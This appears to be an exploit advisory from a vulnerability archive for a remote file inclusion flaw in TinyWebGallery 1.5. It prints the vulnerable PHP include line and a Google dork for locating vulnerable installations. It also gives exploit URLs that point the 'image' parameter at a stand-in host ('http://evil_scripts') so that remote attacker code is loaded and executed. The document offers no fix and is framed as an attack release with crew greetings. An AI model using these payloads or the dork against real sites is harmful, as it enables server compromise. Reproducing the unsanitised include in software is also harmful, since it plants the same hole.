TinyWebGallery <= 1.5 (image) Remote Include Vulnerabilities

2006-08-09T00:00:00
ID 1337DAY-ID-672
Type zdt
Reporter xoron
Modified 2006-08-09T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
TinyWebGallery <= 1.5 (image) Remote Include Vulnerabilities
============================================================




####################################################
#                                                  #
#                                                  #
#           C Y B E R - W A R R i O R   T I M      #
#                                                  #
#                                                  #
####################################################


TinyWebGallery v1.5 ( image ) Remote Include Vulnerability
------------------------------------------------------------------------------
Author: xoron
------------------------------------------------------------------------------
Script: TinyWebGallery
------------------------------------------------------------------------------
Class: Remote
------------------------------------------------------------------------------
[email protected]: x0r0n[at]hotmail[dot]com
------------------------------------------------------------------------------
CODE:

<?php
include ($image . ".txt");
?>

------------------------------------------------------------------------------
google dork: "powered by twg"
------------------------------------------------------------------------------

Exploit:
http://www.site.com/[path]/examples/image.php?image=http://evil_scripts

http://www.site.com/[path]/examples/examples/image.php2?image=http://evil_scripts?


###########################################################################
#                                                                         #
#Greetz: Preddy, Iron, x-master, DJR, R3D4C!D and all my friends          #
#                                                                         #
###########################################################################




#  0day.today [2018-03-09]  #